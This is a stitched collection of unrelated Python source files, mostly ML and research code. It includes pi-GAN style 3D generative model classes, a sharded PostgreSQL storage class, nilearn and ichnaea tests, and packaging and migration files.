add more color layers """ def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=128, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) # self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+32, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.label_layer_linear = nn.Sequential( nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, self.output_dim-4) ) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.network[0].apply(modified_first_sine_init) self.color_layer_sine[0].apply(modified_first_sine_init) self.spatial_embeddings = nn.Parameter(torch.randn(1, 32, 96, 96, 96)*0.01) # !! Important !! Set this value to the expected side-length of your scene. e.g. for for faces, heads usually fit in # a box of side-length 0.24, since the camera has such a narrow FOV. For other scenes, with higher FOV, probably needs to be bigger. 
self.gridwarper = UniformBoxWarp(0.24) def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 input = self.gridwarper(input) shared_features = sample_from_3dgrid(input, self.spatial_embeddings) # x = torch.cat([shared_features, input], -1) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) rbg = torch.cat([shared_features, x], dim=-1) sigma = self.final_layer(x) labels = self.label_layer_linear(x) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class TextureEmbeddingPiGAN128SEMANTICDISENTANGLE_WO_DIR_debug(nn.Module): """ 1. Smaller architecture that has an additional cube of embeddings. Often gives better fine details. Embeddings are in color prediction branch instead of density network; 2. remove view direction 3. add more color layers """ def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=128, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) # self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+32, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.label_layer_linear = nn.Sequential( nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, self.output_dim-4) ) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.network[0].apply(modified_first_sine_init) self.color_layer_sine[0].apply(modified_first_sine_init) self.spatial_embeddings = nn.Parameter(torch.randn(1, 32, 96, 96, 96)*0.01) # !! Important !! Set this value to the expected side-length of your scene. e.g. 
for for faces, heads usually fit in # a box of side-length 0.24, since the camera has such a narrow FOV. For other scenes, with higher FOV, probably needs to be bigger. self.gridwarper = UniformBoxWarp(0.24) def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 input = self.gridwarper(input) shared_features = sample_from_3dgrid(input, self.spatial_embeddings) # x = torch.cat([shared_features, input], -1) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) rbg = torch.cat([shared_features, x], dim=-1) sigma = self.final_layer(x) labels = self.label_layer_linear(x) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class TextureEmbeddingPiGAN128SEMANTICDISENTANGLE_WO_DIR_debug2(nn.Module): """ 1. Smaller architecture that has an additional cube of embeddings. Often gives better fine details. Embeddings are in color prediction branch instead of density network; 2. remove view direction 3. add more color layers """ def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=128, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) # self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+32, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.label_layer_linear = nn.Sequential( nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, self.output_dim-4) ) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.network[0].apply(modified_first_sine_init) # self.color_layer_sine[0].apply(modified_first_sine_init) self.spatial_embeddings = nn.Parameter(torch.randn(1, 32, 96, 96, 96)*0.01) # !! 
Important !! Set this value to the expected side-length of your scene. e.g. for faces, heads usually fit in
        # a box of side-length 0.24, since the camera has such a narrow FOV. For other scenes, with higher FOV, probably needs to be bigger.
        self.gridwarper = UniformBoxWarp(0.24)

    def forward(self, input, z_geo, z_app, ray_directions, **kwargs):
        frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo)
        frequencies_app, phase_shifts_app = self.app_mapping_network(z_app)
        return self.forward_with_frequencies_phase_shifts(
            input, frequencies_geo, frequencies_app,
            phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs)

    def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app,
                                              phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs):
        frequencies_geo = frequencies_geo*15 + 30
        frequencies_app = frequencies_app*15 + 30

        input = self.gridwarper(input)
        shared_features = sample_from_3dgrid(input, self.spatial_embeddings)
        # x = torch.cat([shared_features, input], -1)
        x = input

        for index, layer in enumerate(self.network):
            start = index * self.hidden_dim
            end = (index+1) * self.hidden_dim
            x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end])

        rbg = torch.cat([shared_features, x], dim=-1)
        sigma = self.final_layer(x)
        labels = self.label_layer_linear(x)

        for index, layer in enumerate(self.color_layer_sine):
            start, end = index * self.hidden_dim, (index+1) * self.hidden_dim
            rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start:end])
        rbg = torch.sigmoid(self.color_layer_linear(rbg))

        return torch.cat([labels, rbg, sigma], dim=-1)


class TextureEmbeddingPiGAN256SEMANTICDISENTANGLE_WO_DIR_DIM_96(TextureEmbeddingPiGAN128SEMANTICDISENTANGLE_WO_DIR):
    """Smaller architecture that has an additional cube of embeddings. Often gives better fine details.
    Embeddings are in the color prediction branch instead of the density network."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs, hidden_dim=256)
        self.spatial_embeddings = nn.Parameter(torch.randn(1, 32, 96, 96, 96)*0.1)


def main():
    # model = SPATIALSIRENVOLUME(input_dim=3, z_dim=256, hidden_dim=256, output_dim=4, device=None)
    model = SPATIALSIRENSEMANTIC(input_dim=3, z_dim=256, hidden_dim=256, output_dim=4, device=None)
    input, z, ray_directions = torch.randn(2, 4000, 3), torch.rand(2, 256), torch.rand(2, 4000, 3)
    output = model(input, z, ray_directions)
    print(output.shape)


if __name__ == "__main__":
    main()
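
# A minimal smoke-test sketch for the disentangled variants, appended below the
# original entry point for illustration; the shapes and output_dim value are
# assumptions, not from the original file. output_dim counts label channels
# plus RGB (3) plus sigma (1), so output_dim=24 yields 20 label channels.
def demo_disentangled():
    model = TextureEmbeddingPiGAN128SEMANTICDISENTANGLE(
        input_dim=3, z_geo_dim=256, z_app_dim=256, hidden_dim=128, output_dim=24)
    points = torch.randn(2, 4000, 3)                        # sampled 3D points per batch
    z_geo, z_app = torch.rand(2, 256), torch.rand(2, 256)   # separate geometry/appearance codes
    ray_directions = torch.rand(2, 4000, 3)
    output = model(points, z_geo, z_app, ray_directions)
    print(output.shape)  # expected: torch.Size([2, 4000, 24])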
11589949
from abc import ABCMeta, abstractmethod

from six import add_metaclass


@add_metaclass(ABCMeta)
class InitDataInterface(object):
    """
    Interface that represents all data store interactions required by __init__.
    """

    @abstractmethod
    def is_app_repository(self, namespace_name, repository_name):
        """
        Args:
            namespace_name: namespace or user
            repository_name: repository

        Returns:
            Boolean
        """
        pass

    @abstractmethod
    def repository_is_public(self, namespace_name, repository_name):
        """
        Args:
            namespace_name: namespace or user
            repository_name: repository

        Returns:
            Boolean
        """
        pass

    @abstractmethod
    def log_action(self, kind, namespace_name, repository_name, performer, ip, metadata):
        """
        Args:
            kind: type of log
            namespace_name: name of the user or organization the repository belongs to
            repository_name: repository the action is related to
            performer: user doing the action
            ip: originating ip
            metadata: metadata

        Returns:
            None
        """
        pass
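
# A hypothetical in-memory implementation sketch, added for illustration only;
# the backing dict layout and the 'application' kind value are assumptions,
# not part of the original interface.
class InMemoryInitData(InitDataInterface):
    def __init__(self, repos):
        # repos: dict mapping (namespace_name, repository_name) ->
        #        {'kind': 'application' | 'image', 'public': bool}
        self._repos = repos
        self._logs = []

    def is_app_repository(self, namespace_name, repository_name):
        repo = self._repos.get((namespace_name, repository_name))
        return bool(repo and repo.get('kind') == 'application')

    def repository_is_public(self, namespace_name, repository_name):
        repo = self._repos.get((namespace_name, repository_name))
        return bool(repo and repo.get('public'))

    def log_action(self, kind, namespace_name, repository_name, performer, ip, metadata):
        # Append-only audit log; a real store would persist this.
        self._logs.append((kind, namespace_name, repository_name, performer, ip, metadata))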
11589962
from .selfsupervised_patches import SelfSupervisedDataset


def load_dataset(dataset_name, data_path, normal_class, cfg):
    """Loads the dataset."""

    # Note the trailing comma: without it this would be a plain string, and the
    # membership test below would accept any substring of 'selfsupervised'.
    implemented_datasets = ('selfsupervised',)
    assert dataset_name in implemented_datasets

    dataset = None

    if dataset_name == 'selfsupervised':
        dataset = SelfSupervisedDataset(root=data_path,
                                        train=cfg.settings['train_folder'],
                                        val_pos=cfg.settings['val_pos_folder'],
                                        val_neg=cfg.settings['val_neg_folder'],
                                        rgb=cfg.settings['rgb'],
                                        ir=cfg.settings['ir'],
                                        depth=cfg.settings['depth'],
                                        depth_3d=cfg.settings['depth_3d'],
                                        normals=cfg.settings['normals'],
                                        normal_angle=cfg.settings['normal_angle'])

    return dataset
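
# A hedged call sketch: `cfg` is assumed to expose a `settings` dict with the
# folder and modality keys read above; the stub below exists purely for
# illustration and mirrors no real config class.
if __name__ == "__main__":
    class _StubConfig:
        settings = {'train_folder': 'train', 'val_pos_folder': 'val_pos',
                    'val_neg_folder': 'val_neg', 'rgb': True, 'ir': False,
                    'depth': True, 'depth_3d': False, 'normals': False,
                    'normal_angle': False}

    dataset = load_dataset('selfsupervised', './data', normal_class=0, cfg=_StubConfig())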
11590026
import io


class TqdmBuffer(io.StringIO):
    # Class-level attributes: the latest progress line is shared across all
    # instances, so other code can poll it without holding a reference to the
    # buffer that tqdm writes into.
    foo = ""
    buf = ""

    def __init__(self):
        super(TqdmBuffer, self).__init__()

    def write(self, buf):
        # tqdm emits lines padded with carriage returns; keep only the text.
        TqdmBuffer.foo = buf.strip("\r\n\t ")

    def flush(self):
        # Publish the last written line only on flush, so readers never see a
        # half-written progress string.
        TqdmBuffer.buf = TqdmBuffer.foo
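
# A hedged usage sketch: tqdm's `file=` parameter accepts any object with
# write()/flush(), so this buffer can capture the progress line for another
# consumer (e.g. a GUI label) to poll.
if __name__ == "__main__":
    from tqdm import tqdm

    buffer = TqdmBuffer()
    for _ in tqdm(range(100), file=buffer):
        pass
    print(TqdmBuffer.buf)  # last flushed progress line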
11590043
from typing import List, Tuple, Dict from collections import defaultdict from sqlalchemy.sql import text as sql from ..common.story_key import StoryId from ..common.story_data import StoryData from .postgres_client import PostgresClient from .postgres_sharding import sharding_for _KEY = Tuple[int, int] class PostgresStoryStorage: def __init__(self, client: PostgresClient): self._client = client def get_content(self, feed_id: int, offset: int) -> str: r = self.batch_get_content([(feed_id, offset)]) if not r: return None _, content = r[0] return content def delete_content(self, feed_id: int, offset: int) -> None: self.batch_delete_content([(feed_id, offset)]) def save_content(self, feed_id: int, offset: int, content: str) -> None: self.batch_save_content([((feed_id, offset), content)]) @classmethod def _split_by(cls, items: list, by: callable) -> dict: groups = defaultdict(list) for item in items: groups[by(item)].append(item) return groups @classmethod def _split_keys(cls, keys: List[_KEY]) -> Dict[int, List[_KEY]]: return cls._split_by(keys, lambda x: sharding_for(x[0])) @classmethod def _split_items(cls, items: List[Tuple[_KEY, str]]) -> Dict[int, List[Tuple[_KEY, str]]]: return cls._split_by(items, lambda x: sharding_for(x[0][0])) @staticmethod def _to_id_tuple(keys: List[_KEY]) -> tuple: return tuple(StoryId.encode(feed_id, offset) for feed_id, offset in keys) def batch_get_content(self, keys: List[_KEY]) -> List[Tuple[_KEY, str]]: result = [] if not keys: return result groups = self._split_keys(keys) for volume, group_keys in groups.items(): result.extend(self._batch_get_content(volume, group_keys)) return result def _batch_get_content(self, volume: int, keys: List[_KEY]) -> List[Tuple[_KEY, str]]: q = sql(""" SELECT id, content FROM {table} WHERE id IN :id_tuple """.format(table=self._client.get_table(volume))) id_tuple = self._to_id_tuple(keys) with self._client.get_engine(volume).connect() as conn: rows = list(conn.execute(q, id_tuple=id_tuple).fetchall()) result = [] for story_id, content_data in rows: key = StoryId.decode(story_id) if content_data: content = StoryData.decode_text(content_data) else: content = None result.append((key, content)) return result def batch_delete_content(self, keys: List[_KEY]) -> None: if not keys: return groups = self._split_keys(keys) for volume, group_keys in groups.items(): self._batch_delete_content(volume, group_keys) def _batch_delete_content(self, volume: int, keys: List[_KEY]) -> None: q = sql(""" DELETE FROM {table} WHERE id IN :id_tuple """.format(table=self._client.get_table(volume))) id_tuple = self._to_id_tuple(keys) with self._client.get_engine(volume).connect() as conn: with conn.begin(): conn.execute(q, id_tuple=id_tuple) def batch_save_content(self, items: List[Tuple[_KEY, str]]) -> None: if not items: return groups = self._split_items(items) for volume, group_items in groups.items(): self._batch_save_content(volume, group_items) def _batch_save_content(self, volume: int, items: List[Tuple[_KEY, str]]) -> None: q = sql(""" INSERT INTO {table} (id, content) VALUES (:id, :content) ON CONFLICT (id) DO UPDATE SET content = EXCLUDED.content """.format(table=self._client.get_table(volume))) params = [] for (feed_id, offset), content in items: story_id = StoryId.encode(feed_id, offset) if content: content_data = StoryData.encode_text(content) else: content_data = b'' params.append({'id': story_id, 'content': content_data}) with self._client.get_engine(volume).connect() as conn: with conn.begin(): conn.execute(q, params)
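
# A minimal sketch of the grouping helper that powers the batch methods; the
# modulo function below is a stand-in for the real sharding_for(), used only
# so this snippet is self-contained.
if __name__ == "__main__":
    keys = [(1, 0), (2, 0), (3, 1)]
    groups = PostgresStoryStorage._split_by(keys, by=lambda key: key[0] % 2)
    print(dict(groups))  # {1: [(1, 0), (3, 1)], 0: [(2, 0)]}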
11590044
import numpy as np import pytest from nilearn._utils.data_gen import generate_group_sparse_gaussian_graphs from nilearn.connectome.group_sparse_cov import (group_sparse_covariance, group_sparse_scores) from nilearn.connectome import GroupSparseCovariance, GroupSparseCovarianceCV def test_group_sparse_covariance(): # run in debug mode. Should not fail # without debug mode: cost must decrease. signals, _, _ = generate_group_sparse_gaussian_graphs( density=0.1, n_subjects=5, n_features=10, min_n_samples=100, max_n_samples=151, random_state=np.random.RandomState(0)) alpha = 0.1 # These executions must hit the tolerance limit emp_covs, omega = group_sparse_covariance(signals, alpha, max_iter=20, tol=1e-2, debug=True, verbose=0) emp_covs, omega2 = group_sparse_covariance(signals, alpha, max_iter=20, tol=1e-2, debug=True, verbose=0) np.testing.assert_almost_equal(omega, omega2, decimal=4) class Probe(object): def __init__(self): self.objective = [] def __call__(self, emp_covs, n_samples, alpha, max_iter, tol, n, omega, omega_diff): if n >= 0: _, objective = group_sparse_scores(omega, n_samples, emp_covs, alpha) self.objective.append(objective) # Use a probe to test for number of iterations and decreasing objective. probe = Probe() emp_covs, omega = group_sparse_covariance( signals, alpha, max_iter=4, tol=None, verbose=0, probe_function=probe) objective = probe.objective # check number of iterations assert len(objective) == 4 # np.testing.assert_array_less is a strict comparison. # Zeros can occur in np.diff(objective). assert np.all(np.diff(objective) <= 0) assert omega.shape == (10, 10, 5) # Test input argument checking pytest.raises(ValueError, group_sparse_covariance, signals, "") pytest.raises(ValueError, group_sparse_covariance, 1, alpha) pytest.raises(ValueError, group_sparse_covariance, [np.ones((2, 2)), np.ones((2, 3))], alpha) # Check consistency between classes gsc1 = GroupSparseCovarianceCV(alphas=4, tol=1e-1, max_iter=20, verbose=0, early_stopping=True) gsc1.fit(signals) gsc2 = GroupSparseCovariance(alpha=gsc1.alpha_, tol=1e-1, max_iter=20, verbose=0) gsc2.fit(signals) np.testing.assert_almost_equal(gsc1.precisions_, gsc2.precisions_, decimal=4)
11590069
import logging try: from ms_deisotope.data_source._vendor.AgilentD import ( AgilentDLoader, register_dll_dir, AgilentDScanPtr, AgilentDDataInterface, log as _api_logger) from comtypes import COMError comtypes_logger = logging.getLogger("comtypes") comtypes_logger.setLevel("INFO") _api_logger.setLevel("INFO") def is_agilent_d_dir(path): try: AgilentDLoader(path) return True except (WindowsError, IOError, ImportError, COMError): return False def infer_reader(path): if is_agilent_d_dir(path): return AgilentDLoader raise ValueError("Not Agilent .d Directory") def determine_if_available(): try: AgilentDLoader.create_com_object() return True except (WindowsError, COMError): return False except ImportError as e: message = str(e) def is_agilent_d_dir(path): return False def infer_reader(path): raise ValueError(message) def register_dll_dir(paths): print("no-op: %s" % (message,)) return False def determine_if_available(): print("no-op: %s" % (message,)) return False class AgilentDLoader(object): def __init__(self, *args, **kwargs): raise ImportError(message)
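
# A hedged usage sketch (the path is a placeholder): pick a reader for a .d
# directory only when the vendor COM bindings are actually available, and
# fall back cleanly otherwise.
if __name__ == "__main__":
    sample_path = r"C:\data\sample.d"  # hypothetical acquisition directory
    if determine_if_available():
        reader_cls = infer_reader(sample_path)
        reader = reader_cls(sample_path)
    else:
        print("Agilent .d support is not available on this platform")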
11590090
from ichnaea.api.locate.internal import InternalRegionSource from ichnaea.api.locate.score import area_score, station_score from ichnaea.api.locate.tests.base import BaseSourceTest from ichnaea.geocode import GEOCODER from ichnaea.tests.factories import BlueShardFactory, CellAreaFactory, WifiShardFactory from ichnaea import util class TestRegionSource(BaseSourceTest): Source = InternalRegionSource api_type = "region" def test_blue(self, geoip_db, http_session, session, source, metricsmock): """Bluetooth stations can be used to determine the region.""" now = util.utcnow() region = GEOCODER.regions_for_mcc(235, metadata=True)[0] blue1 = BlueShardFactory(samples=10) blue2 = BlueShardFactory(samples=20) blue3 = BlueShardFactory.build(region="DE", samples=100) session.flush() query = self.model_query( geoip_db, http_session, session, blues=[blue1, blue2, blue3] ) results = source.search(query) self.check_model_results(results, [region]) best_result = results.best() assert best_result.region_code == region.code assert best_result.score == station_score(blue1, now) + station_score( blue2, now ) metricsmock.assert_incr_once( self.api_type + ".source", tags=["key:test", "source:internal", "accuracy:low", "status:hit"], ) def test_blue_miss(self, geoip_db, http_session, session, source): """Unknown Bluetooth stations fail to determine the region.""" blues = BlueShardFactory.build_batch(2, samples=10) session.flush() query = self.model_query(geoip_db, http_session, session, blues=blues) results = source.search(query) self.check_model_results(results, None) def test_from_mcc(self, geoip_db, http_session, session, source, metricsmock): region = GEOCODER.regions_for_mcc(235, metadata=True)[0] area = CellAreaFactory(mcc=235, num_cells=10) session.flush() query = self.model_query(geoip_db, http_session, session, cells=[area]) results = source.search(query) self.check_model_results(results, [region]) assert results[0].score == 1.0 metricsmock.assert_incr_once( self.api_type + ".source", tags=["key:test", "source:internal", "accuracy:low", "status:hit"], ) def test_ambiguous_mcc(self, geoip_db, http_session, session, source, metricsmock): now = util.utcnow() regions = GEOCODER.regions_for_mcc(234, metadata=True) area = CellAreaFactory(mcc=234, num_cells=10) session.flush() query = self.model_query(geoip_db, http_session, session, cells=[area]) results = source.search(query) self.check_model_results(results, regions) assert results.best().region_code == "GB" for result in results: score = 0.25 if result.region_code == "GB": score += area_score(area, now) assert result.score == score metricsmock.assert_incr_once( self.api_type + ".source", tags=["key:test", "source:internal", "accuracy:low", "status:hit"], ) def test_multiple_mcc(self, geoip_db, http_session, session, source): now = util.utcnow() region = GEOCODER.regions_for_mcc(235, metadata=True)[0] area = CellAreaFactory(mcc=234, num_cells=6) area2 = CellAreaFactory(mcc=235, num_cells=8) session.flush() query = self.model_query(geoip_db, http_session, session, cells=[area, area2]) results = source.search(query) assert len(results) > 2 best_result = results.best() assert best_result.region_code == region.code assert best_result.score == 1.25 + area_score(area, now) def test_invalid_mcc(self, geoip_db, http_session, session, source): area = CellAreaFactory.build(mcc=235, num_cells=10) area.mcc = 999 query = self.model_query(geoip_db, http_session, session, cells=[area]) results = source.search(query) self.check_model_results(results, None) def 
test_wifi(self, geoip_db, http_session, session, source, metricsmock): now = util.utcnow() region = GEOCODER.regions_for_mcc(235, metadata=True)[0] wifi1 = WifiShardFactory(samples=10) wifi2 = WifiShardFactory(samples=20) wifi3 = WifiShardFactory.build(region="DE", samples=100) session.flush() query = self.model_query( geoip_db, http_session, session, wifis=[wifi1, wifi2, wifi3] ) results = source.search(query) self.check_model_results(results, [region]) best_result = results.best() assert best_result.region_code == region.code assert best_result.score == station_score(wifi1, now) + station_score( wifi2, now ) metricsmock.assert_incr_once( self.api_type + ".source", tags=["key:test", "source:internal", "accuracy:low", "status:hit"], ) def test_wifi_miss(self, geoip_db, http_session, session, source): wifis = WifiShardFactory.build_batch(2, samples=10) session.flush() query = self.model_query(geoip_db, http_session, session, wifis=wifis) results = source.search(query) self.check_model_results(results, None)
11590096
import setuptools

with open("README.rst", "r") as fh:
    long_description = fh.read()

setuptools.setup(
    name='django_searchable',
    packages=setuptools.find_packages(),
    install_requires=[
        # '2.x' is not a valid PEP 440 specifier; pin the intended floor instead.
        'Django>=2.0',
        'psycopg2-binary>=2.7.4',
    ],
    long_description=long_description,
    version='0.1.2',
    description='Easy FTS with Django and PostgreSQL',
    author='<NAME>',
    author_email='<EMAIL>',
    url='https://github.com/rjauquet/django-searchable',
    download_url='https://github.com/rjauquet/django-searchable/archive/0.1.2.tar.gz',
    keywords=['search', 'searchable', 'fts'],
    classifiers=[],
)
11590117
from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('documents', '0067_auto_20201024_1120'), ] operations = [ migrations.DeleteModel( name='DeletedDocument', ), migrations.RenameField( model_name='document', old_name='deleted_date_time', new_name='trashed_date_time', ), ]
11590135
from typing import Type from StructNoSQL import ExternalDynamoDBApiCachingTable, TableDataModel, PrimaryIndex, ExternalDynamoDBApiBasicTable class InoftVocalEngineBasicTable(ExternalDynamoDBApiBasicTable): def __init__( self, data_model: Type[TableDataModel], table_id: str, region_name: str, engine_account_id: str, engine_project_id: str, engine_api_key: str, ): self.engine_table_id = table_id self.engine_account_id = engine_account_id self.engine_project_id = engine_project_id super().__init__( api_http_endpoint=f'http://127.0.0.1:5000/api/v1/{self.engine_account_id}/{self.engine_project_id}/database-client?accessToken={engine_api_key}', primary_index=PrimaryIndex(hash_key_name='accountProjectTableKeyId', hash_key_variable_python_type=str), data_model=data_model, base_payload={'tableId': table_id} ) class InoftVocalEngineCachingTable(ExternalDynamoDBApiCachingTable): def __init__( self, data_model: Type[TableDataModel], table_id: str, region_name: str, engine_account_id: str, engine_project_id: str, engine_api_key: str, ): self.engine_table_id = table_id self.engine_account_id = engine_account_id self.engine_project_id = engine_project_id super().__init__( api_http_endpoint=f'http://127.0.0.1:5000/api/v1/{self.engine_account_id}/{self.engine_project_id}/database-client?accessToken={engine_api_key}', primary_index=PrimaryIndex(hash_key_name='accountProjectTableKeyId', hash_key_variable_python_type=str), data_model=data_model, base_payload={'tableId': table_id} )
11590194
import operator import pdb import z3 import sage.all import helpers.vcommon as CM from helpers.miscs import Miscs import settings import infer.base from data.traces import Traces, DTraces from data.inv.base import Inv from data.inv.invs import Invs, DInvs from data.inv.eqt import Eqt from data.inv.oct import Oct from data.inv.prepost import PrePost DBG = pdb.set_trace mlog = CM.getLogger(__name__, settings.LOGGER_LEVEL) class Infer(infer.base.Infer): def __init__(self, symstates, prog): super().__init__(symstates, prog) self.use_reals = self.symstates.use_reals def gen(self, dinvs, dtraces): assert isinstance(dinvs, DInvs), dinvs assert isinstance(dtraces, DTraces), dtraces dinvs_ = DInvs() post_locs = [loc for loc in dinvs if settings.POST_LOC in loc] for loc in post_locs: postconds = [self.get_postconds(inv.inv) for inv in dinvs[loc] if isinstance(inv, Eqt)] postconds = [pcs for pcs in postconds if pcs] postconds = set(p for pcs in postconds for p in pcs) preposts = [] for postcond in postconds: prepost = self.get_preposts(loc, postcond, dtraces) if prepost: preposts.append(prepost) if preposts: dinvs_[loc] = Invs(preposts) # preposts = self.get_preposts(loc, postconds, traces[loc]) # if preposts: # dinvs_[loc] = Invs(preposts) return dinvs_ @property def preconds(self): try: return self._preconds except AttributeError: symbols = self.prog.inp_decls.sageExprs self._preconds = self.get_preconds(symbols, term_siz=2) return self._preconds def get_preposts(self, loc, postcond, dtraces): assert isinstance(loc, str), loc assert postcond.operator() == operator.eq, postcond postcond_expr = Eqt(postcond).expr(self.use_reals) import infer.opt solver = infer.opt.Ieq(self.symstates, self.prog) preconds = solver.gen(dtraces, [loc], postcond_expr) preconds = list(preconds[loc]) if loc in preconds else [] print('hi', postcond, preconds) #conj_preconds = self.get_conj_preconds(loc, preconds, postcond) if preconds: precond_expr = z3.And([pc.expr(self.use_reals) for pc in preconds]) inv = z3.Implies(precond_expr, postcond_expr) cexs, isSucc = self.symstates.mcheck_d(loc, inv, None, 1) if not cexs and isSucc: prepost = PrePost(Invs(preconds), postcond, stat=Inv.PROVED) prepost.is_conj = True return prepost else: return None return None # def get_preposts(self, loc, postconds, traces): # assert isinstance(loc, str), loc # assert isinstance(postconds, set) and postconds, postconds # assert all(p.operator() == 